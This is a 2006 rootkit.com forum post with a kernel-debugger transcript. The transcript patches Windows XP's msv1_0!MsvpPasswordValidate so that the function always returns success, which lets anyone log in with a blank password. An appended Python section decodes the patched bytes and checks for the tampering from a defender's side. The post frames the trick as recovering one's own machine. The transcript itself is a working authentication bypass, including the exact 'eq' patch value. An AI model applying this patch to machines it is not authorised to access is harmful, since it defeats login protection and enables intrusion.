Bypassing your testbox's login password
Aug 10 2006, 16:21 (UTC+0)
bugcheck writes: After living out of a duffle bag for 2 months now I've finally got all my stuff back and have settled into a new apartment and finally have dev PCs again, W00h00! So this isn't the first time I have had to do this to recover an install with a forgotten password, but I figured I'd share it in case you are able to take advantage of it (thx to a friend for pointing out what function did the trick). As stupid as I am, I always pick those unique but easy to remember passwords that of course I'll never forget, use it once and shelf the image for months at a time, and then of course forget it. In my case today it's my dev box!!! Luckily I had been using it as a test machine when I first got it, so I happened to already have a boot.ini entry to kernel debug on 1394 and of course had my laptop handy. I know there are better ways to recover a forgotten password, but of course it's not as cool as this! =P It doesn't reset it, but at least you can log in again...

Happy debugging,
Chris

kd> !process 0 0 winlogon.exe
PROCESS 817bb978 SessionId: 0 Cid: 0260 Peb: 7ffdc000 ParentCid: 0168
DirBase: 05e40060 ObjectTable: e148a858 HandleCount: 455.
Image: winlogon.exe

kd> .process /p /r 817bb978
Implicit process is now 817bb978
.cache forcedecodeuser done
Loading User Symbols
...................................................
kd> u msv1_0!MsvpPasswordValidate l3
msv1_0!MsvpPasswordValidate:
77c79927 ??
^ Memory access error in 'u msv1_0!MsvpPasswordValidate l3'

kd> .pagein msv1_0!MsvpPasswordValidate
You need to continue execution (press 'g' ) for the pagein to be brought in. When the debugger breaks in again, the page will be present.

kd> g
Break instruction exception - code 80000003 (first chance)
nt!RtlpBreakWithStatusInstruction:
80526da8 cc int 3

kd> u msv1_0!MsvpPasswordValidate l3
msv1_0!MsvpPasswordValidate:
77c79927 8bff mov edi,edi
77c79929 55 push ebp
77c7992a 8bec mov ebp,esp

kd> eq msv1_0!MsvpPasswordValidate cccc000cc201b0

kd> u msv1_0!MsvpPasswordValidate l3
msv1_0!MsvpPasswordValidate:
77c79927 b001 mov al,0x1
77c79929 c20c00 ret 0xc
77c7992c cc int 3

kd> ** YOU CAN NOW LOGIN WITH A BLANK PASSWORD!
kd> ** DONT BE SCREWIN WITH YOUR CO-WORKERS NOW =p

kd> g
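An added example, not part of bugcheck's post: the eq command above writes a single little-endian qword over the first eight bytes of MsvpPasswordValidate, which is why the next u shows mov al,0x1 / ret 0xc / int 3. The Python below lays that qword out the way eq does, decodes it with a tiny decoder that covers only the opcodes appearing in this transcript, and runs the check a defender would apply to a live copy of the function: compare its first bytes against the on-disk prologue (mov edi,edi / push ebp / mov ebp,esp, as shown in the first successful u) and flag any deviation. The byte samples are constructed from the transcript; the function names are assumptions for this example.

```python
import struct

# Prologue of msv1_0!MsvpPasswordValidate as the transcript shows it before
# patching: mov edi,edi / push ebp / mov ebp,esp (the hotpatchable prologue
# of XP-era Microsoft binaries). Constructed from the page's `u` output.
EXPECTED_PROLOGUE = bytes.fromhex("8bff558bec")

# The qword written by the page's `eq` command (value copied from the transcript).
PATCH_QWORD = 0xCCCC000CC201B0


def qword_to_bytes(value: int) -> bytes:
    """Lay out a 64-bit value the way `eq` stores it in memory: little-endian."""
    return struct.pack("<Q", value)


def disasm_prefix(code: bytes):
    """Decode only the handful of x86 opcodes that occur in this transcript.

    Returns a list of (offset, hex bytes, mnemonic). Decoding stops at the
    first byte this toy decoder does not know (it is not a general disassembler).
    """
    out = []
    i = 0
    while i < len(code):
        b = code[i]
        if code[i:i + 2] == b"\x8b\xff":
            out.append((i, "8bff", "mov edi,edi"))
            i += 2
        elif b == 0x55:
            out.append((i, "55", "push ebp"))
            i += 1
        elif code[i:i + 2] == b"\x8b\xec":
            out.append((i, "8bec", "mov ebp,esp"))
            i += 2
        elif b == 0xB0 and i + 1 < len(code):            # mov al, imm8
            imm = code[i + 1]
            out.append((i, code[i:i + 2].hex(), f"mov al,0x{imm:x}"))
            i += 2
        elif b == 0xC2 and i + 2 < len(code):            # ret imm16
            imm = struct.unpack_from("<H", code, i + 1)[0]
            out.append((i, code[i:i + 3].hex(), f"ret 0x{imm:x}"))
            i += 3
        elif b == 0xCC:                                  # int 3
            out.append((i, "cc", "int 3"))
            i += 1
        else:
            break
    return out


def prologue_intact(live_bytes: bytes) -> bool:
    """Integrity check: do the live first bytes still match the on-disk prologue?"""
    return live_bytes[:len(EXPECTED_PROLOGUE)] == EXPECTED_PROLOGUE


def audit(live_bytes: bytes) -> dict:
    """Summarise what an integrity monitor would report for one snapshot of the function."""
    mnemonics = [m for _, _, m in disasm_prefix(live_bytes)]
    return {
        "intact": prologue_intact(live_bytes),
        "decoded": mnemonics,
        # The patched form's signature: an immediate return of a non-zero AL.
        "forced_success": mnemonics[:2] == ["mov al,0x1", "ret 0xc"],
    }


if __name__ == "__main__":
    for label, snapshot in (("original", EXPECTED_PROLOGUE),
                            ("after eq", qword_to_bytes(PATCH_QWORD))):
        print(label, audit(snapshot))
```

The precondition the post itself names, a boot.ini entry enabling kernel debugging, is what lets an attached debugger rewrite lsass-hosted code like this; the check above only detects the patched state after the fact, so the mitigation is to keep debug boot entries off any machine whose login matters.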


(c) www.rootkit.com / http://www.rootkit.com/